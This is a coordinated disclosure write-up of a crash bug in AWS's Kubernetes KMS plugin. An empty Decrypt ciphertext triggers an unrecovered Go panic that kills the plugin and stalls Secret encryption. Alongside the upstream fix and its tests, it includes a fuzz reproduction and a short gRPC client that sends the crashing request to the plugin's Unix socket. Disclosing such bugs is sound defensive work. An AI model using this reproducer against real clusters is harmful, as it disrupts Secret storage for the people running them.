Empty-ciphertext panic in aws-encryption-provider (CVD with AWS)
A two-byte gRPC request crashed AWS's Kubernetes KMS plugin. Coordinated disclosure with AWS VDP; fix merged as aws-encryption-provider#169.
| Severity | Medium (per AWS VDP) |
| Asset | kubernetes-sigs/aws-encryption-provider |
| CVE | None assigned |
TL;DR (for the non-Go-fluent reader)
The plugin that lets Kubernetes encrypt its Secret objects at rest with AWS KMS
could be crashed by anyone who could talk to its local socket. On a healthy
control-plane node that’s only the Kubernetes API server itself — but it also
covers any other process that gained local access to that socket (a sidecar
with the socket mounted, a co-tenant on the control plane, a misconfigured
permission). A single decrypt request containing an empty bytes field hit an
unchecked array read; Go panicked; because nothing on the call path called
recover(), the whole plugin process died. While it restarted, the API server
could not encrypt or decrypt any Secret — operations that touch Secret storage
stalled cluster-wide.
We reported it to AWS via HackerOne. AWS confirmed the issue does not affect their managed services (the conditions to trigger it aren’t present in their managed environment, and architectural safeguards further limit impact), and engaged the upstream maintainers. The fix shipped in the open-source repo as a small length guard. Disclosure was coordinated with AWS.
What the tool actually is
kubernetes-sigs/aws-encryption-provider is the Kubernetes KMS plugin AWS
publishes for envelope-encrypting Secret objects against AWS KMS. It runs as a
gRPC server on a Unix domain socket on the control-plane node, speaks the
Kubernetes KMS provider protocol (both v1 and v2), and proxies Encrypt /
Decrypt calls to AWS KMS. kube-apiserver calls it whenever it writes or reads
a Secret.
A single process serves both V1 and V2 APIs on the same grpc.Server
instance — a detail that matters once you start crashing it.
flowchart LR
  S[etcd]:::n
  A[kube-apiserver]:::accent
  P["aws-encryption-provider<br/>gRPC on /var/run/kmsplugin/socket.sock"]:::accent
  K[AWS KMS]:::n
  A -- "Encrypt/Decrypt RPC<br/>(unix socket, no auth)" --> P
  P -- "kms:Encrypt / kms:Decrypt<br/>(IAM-signed)" --> K
  A <--> S
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3
The gRPC server has no auth layer of its own. Access is controlled by Unix socket filesystem permissions only.
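Since file permissions are the only gate, it is worth checking what they actually are on a given node. The following is a minimal sketch, not part of the plugin: `looselyPermissioned` is a hypothetical helper, and the socket path is the one from the diagram above, which may differ in your deployment. It relies on the Linux rule that connecting to a Unix socket requires write permission on the socket file; permissions on the parent directory also matter and are not checked here.

```go
package main

import (
	"fmt"
	"os"
)

// looselyPermissioned reports whether the permission bits grant write access
// to group or other. On Linux, connecting to a Unix socket requires write
// permission on the socket file, so these bits decide who may send RPCs.
// Hypothetical helper for illustration only.
func looselyPermissioned(mode os.FileMode) bool {
	return mode.Perm()&0o022 != 0
}

func main() {
	// Assumed path, taken from the diagram above; adjust for your deployment.
	const socketPath = "/var/run/kmsplugin/socket.sock"

	info, err := os.Stat(socketPath)
	if err != nil {
		fmt.Println("cannot stat socket:", err)
		return
	}
	if info.Mode()&os.ModeSocket == 0 {
		fmt.Println("not a Unix socket:", socketPath)
		return
	}
	fmt.Printf("mode=%v loosely permissioned=%v\n",
		info.Mode().Perm(), looselyPermissioned(info.Mode()))
}
```

A socket at mode 0600 owned by the API server's user passes this check; 0660 or 0666 does not, and would be worth a closer look at who else shares that group or node.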
The bug — V1 path
File: pkg/plugin/plugin.go:179 at the affected commit 4341c70.
func (p *V1Plugin) Decrypt(ctx context.Context, request *pb.DecryptRequest) (*pb.DecryptResponse, error) {
    zap.L().Debug("starting decrypt operation")
    startTime := time.Now()
    if string(request.Cipher[0]) == kmsplugin.StorageVersion { // <-- LINE 179: PANIC if len == 0
        request.Cipher = request.Cipher[1:]
    }
    // ...
}
Encrypt() at line 169 of the same file prepends a storage-version prefix byte
(0x31 / ASCII '1'):
return &pb.EncryptResponse{Cipher: append([]byte(kmsplugin.StorageVersion), result.CiphertextBlob...)}, nil
Decrypt() then expects to strip that prefix. The assumption is that any
ciphertext seen by Decrypt() came from a prior Encrypt() call and is
therefore non-empty. The gRPC layer makes no such guarantee — the Cipher
field is a protobuf bytes value, deserialised to a Go []byte that can be
either nil or []byte{}. Indexing request.Cipher[0] against either of
those crashes the process.
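The failure mode is easy to see in isolation. The sketch below is a standalone stand-in, not the plugin's code: `storageVersion`, `stripPrefixUnchecked`, and `tryStrip` are hypothetical names, and the `recover()` exists only so the demo can run all three inputs in one process, which is exactly what the real plugin lacked.

```go
package main

import "fmt"

// storageVersion stands in for kmsplugin.StorageVersion ("1" per the text above).
const storageVersion = "1"

// stripPrefixUnchecked mirrors the shape of the vulnerable check: it indexes
// element 0 without first checking the length.
func stripPrefixUnchecked(cipher []byte) []byte {
	if string(cipher[0]) == storageVersion {
		return cipher[1:]
	}
	return cipher
}

// tryStrip runs stripPrefixUnchecked and converts a panic into a string so the
// demo can keep going. The vulnerable plugin had no such recover().
func tryStrip(cipher []byte) (result string) {
	defer func() {
		if r := recover(); r != nil {
			result = fmt.Sprintf("panic: %v", r)
		}
	}()
	return fmt.Sprintf("ok: %q", stripPrefixUnchecked(cipher))
}

func main() {
	fmt.Println(tryStrip([]byte("1abc"))) // well-formed: prefix byte + payload
	fmt.Println(tryStrip([]byte{}))       // empty slice
	fmt.Println(tryStrip(nil))            // nil slice
}
```

The well-formed input has its prefix stripped, while both the empty and the nil slice report `index out of range [0] with length 0`. Go treats the two identically for indexing purposes, so a single `len` check covers both.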
The bug — V2 path
File: pkg/plugin/plugin_v2.go:182.
Structurally the same; idiom is slightly different (a type conversion, not a string compare):
storageVersion := kmsplugin.KMSStorageVersion(request.Ciphertext[0]) // LINE 182 — same panic, V2 path
V1 and V2 are registered on the same grpc.Server instance, so crashing
either one tears down both. We reported them as two separate HackerOne reports
to keep the fix targets crisp; the maintainers patched them together in one
PR.
Why this kills the whole process
A Go panic in a goroutine without a recover() on the call stack terminates
the entire process. The gRPC server dispatches each request to a goroutine
spawned by serveStreams, and nothing in aws-encryption-provider registers a
recovery interceptor. The actual stack trace from the reproducer:
panic: runtime error: index out of range [0] with length 0
sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
k8s.io/kms/apis/v1beta1._KeyManagementService_Decrypt_Handler
google.golang.org/grpc.(*Server).processUnaryRPC
google.golang.org/grpc.(*Server).handleStream
google.golang.org/grpc.(*Server).serveStreams.func2.1 <- unrecovered goroutine
flowchart TB
  D["(*V1Plugin).Decrypt<br/>request.Cipher[0]"]:::accent
  H["_KeyManagementService_Decrypt_Handler<br/>(generated code)"]:::n
  P["grpc.(*Server).processUnaryRPC"]:::n
  S["grpc.(*Server).handleStream"]:::n
  G["grpc.(*Server).serveStreams.func2.1<br/>goroutine, no recover()"]:::alert
  E["process exits<br/>plugin pod restarts"]:::alert
  D -- panic --> H --> P --> S --> G --> E
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3
  classDef alert fill:#0A0A0B,stroke:#E8342B,color:#EDEAE3
This is the difference between “a request fails” and “the daemon dies.”
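To make that difference concrete, here is a minimal sketch of the recovery pattern the call path was missing. It is not what the maintainers shipped (they added length guards), and `handler`, `withRecover`, and `fragileDecrypt` are hypothetical names. The example uses only the standard library; in grpc-go the same deferred `recover()` would typically live in a unary server interceptor installed with the `grpc.UnaryInterceptor` server option.

```go
package main

import (
	"errors"
	"fmt"
)

// handler is a stand-in for a unary RPC handler: bytes in, bytes or error out.
type handler func(req []byte) ([]byte, error)

// withRecover wraps h so that a panic inside it surfaces as an error to the
// caller instead of unwinding to the top of the goroutine and killing the
// process.
func withRecover(h handler) handler {
	return func(req []byte) (resp []byte, err error) {
		defer func() {
			if r := recover(); r != nil {
				resp, err = nil, fmt.Errorf("internal error: recovered panic: %v", r)
			}
		}()
		return h(req)
	}
}

// fragileDecrypt indexes req[0] unchecked, like the vulnerable code path.
func fragileDecrypt(req []byte) ([]byte, error) {
	if req[0] != '1' {
		return nil, errors.New("unknown storage version")
	}
	return req[1:], nil
}

func main() {
	safe := withRecover(fragileDecrypt)
	_, err := safe(nil) // would terminate the process without the wrapper
	fmt.Println("request failed, process alive:", err)
}
```

A recovery wrapper is defence in depth, not a substitute for validating input: it turns an unknown future panic into a failed request, but the handler should still reject empty ciphertext explicitly.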
Reproduction
The bug was found by fuzz testing. The harness uses cloud.KMSMock{}, so no
AWS credentials are needed for either method.
Method 1 — direct fuzz harness. Empty []byte{} is registered as seed#0,
which means the panic fires on the very first seed before the fuzzer generates
any new inputs:
git clone https://github.com/kubernetes-sigs/aws-encryption-provider
cd aws-encryption-provider
git checkout 4341c70
go test -fuzz FuzzV1Decrypt -fuzztime 1x ./pkg/plugin/ 2>&1 | tail -20
--- FAIL: FuzzV1Decrypt (0.00s)
--- FAIL: FuzzV1Decrypt/seed#0 (0.00s)
panic: runtime error: index out of range [0] with length 0
sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
.../pkg/plugin/plugin.go:179 +0x7e4
FAIL sigs.k8s.io/aws-encryption-provider/pkg/plugin
Method 2 — live gRPC client over Unix socket. Proves the crash through the full gRPC dispatch path, not just the in-process panic:
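conn, err := grpc.Dial("unix:///var/run/kmsplugin/socket.sock",
    grpc.WithTransportCredentials(insecure.NewCredentials())) // replaces deprecated grpc.WithInsecure()
if err != nil {
    log.Fatal(err)
}
client := pb.NewKeyManagementServiceClient(conn)
// Crashes the server:
_, err = client.Decrypt(context.Background(), &pb.DecryptRequest{Cipher: []byte{}})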
The V2 path repro is identical, with v2pb.NewKeyManagementServiceClient and
&v2pb.DecryptRequest{Ciphertext: []byte{}}.
The fix — PR #169
kubernetes-sigs/aws-encryption-provider#169, opened 2026-04-29, merged 2026-04-30. A pure defensive guard. No logic change, no new behaviour. Two parallel five-line additions:
// pkg/plugin/plugin.go (V1)
if len(request.Cipher) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}
// pkg/plugin/plugin_v2.go (V2)
if len(request.Ciphertext) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}
Plus four new tests — TestDecryptEmptyCipher, TestDecryptNilCipher,
TestDecryptEmptyCiphertextV2, TestDecryptNilCiphertextV2 — each asserting
that the error contains "invalid empty ciphertext" for both the nil and
[]byte{} cases.
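The shape of the guard and of those four assertions can be sketched outside the plugin. This is an illustration under assumptions, not the code from the PR: `stripPrefixChecked` and `errEmptyCiphertext` are hypothetical names, and the prefix byte `'1'` is taken from the Encrypt() description earlier in this post.

```go
package main

import (
	"errors"
	"fmt"
)

// errEmptyCiphertext carries the same message the upstream guard returns.
var errEmptyCiphertext = errors.New("invalid empty ciphertext")

// stripPrefixChecked is a hypothetical helper: it applies the length guard
// before touching index 0, then strips the storage-version prefix if present.
func stripPrefixChecked(cipher []byte) ([]byte, error) {
	if len(cipher) == 0 { // true for both nil and []byte{}
		return nil, errEmptyCiphertext
	}
	if cipher[0] == '1' {
		return cipher[1:], nil
	}
	return cipher, nil
}

func main() {
	cases := []struct {
		name string
		in   []byte
	}{
		{"nil", nil},
		{"empty", []byte{}},
		{"prefixed", []byte("1abc")},
		{"legacy", []byte("abc")},
	}
	for _, c := range cases {
		out, err := stripPrefixChecked(c.in)
		fmt.Printf("%-8s out=%q err=%v\n", c.name, out, err)
	}
}
```

Because `len` returns 0 for a nil slice, one comparison covers both inputs, which is why the upstream tests can assert the same error string for the nil and `[]byte{}` cases.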
AWS’s response, paraphrased: the issue does not impact AWS-managed services or their customers (the component operates in a managed environment where the conditions to trigger this behaviour are not present, and architectural safeguards further limit any potential impact). As an open-source component used by the broader community, AWS engaged the upstream service team to address it.
Calibrated impact
We’re not calling this an RCE and we’re not calling it critical:
- An unrecovered Go panic kills the plugin process. While it restarts,
  kube-apiserver cannot encrypt new Secrets or decrypt existing ones, so
  operations that touch Secret storage stall.
- Trigger requires the ability to send a gRPC Decrypt to the plugin’s local
  Unix socket. On a healthy control-plane node, that’s the local
  kube-apiserver. Real-world exposure is limited to scenarios where another
  local process can reach the socket: misconfigured socket permissions, a
  sidecar with the socket mounted, or a compromised co-tenant on the control
  plane.
- This is not a remote, unauthenticated, internet-facing bug.
- AWS-managed services not affected (per AWS VDP).
It is a reliability fix that AWS was happy to land upstream, precisely because the behaviour was wrong even though the production exposure was constrained.
Timeline
| Date (UTC) | Event |
|---|---|
| 2026-03-22 | Reported to AWS VDP via HackerOne (#3620748, #3620753) |
| 2026-03-30 | Triaged; severity set Medium (downgraded from initial High 7.5) |
| 2026-04-29 | Upstream PR #169 opened |
| 2026-04-30 | PR #169 merged |
| 2026-05-28 | AWS VDP marked reports Resolved |
| 2026-05-28 | Reports publicly disclosed on HackerOne |
| 2026-05-29 | This writeup published |
Two bytes. Months of CVD. That’s how this work usually goes.
— Syntetisk research (misop00p)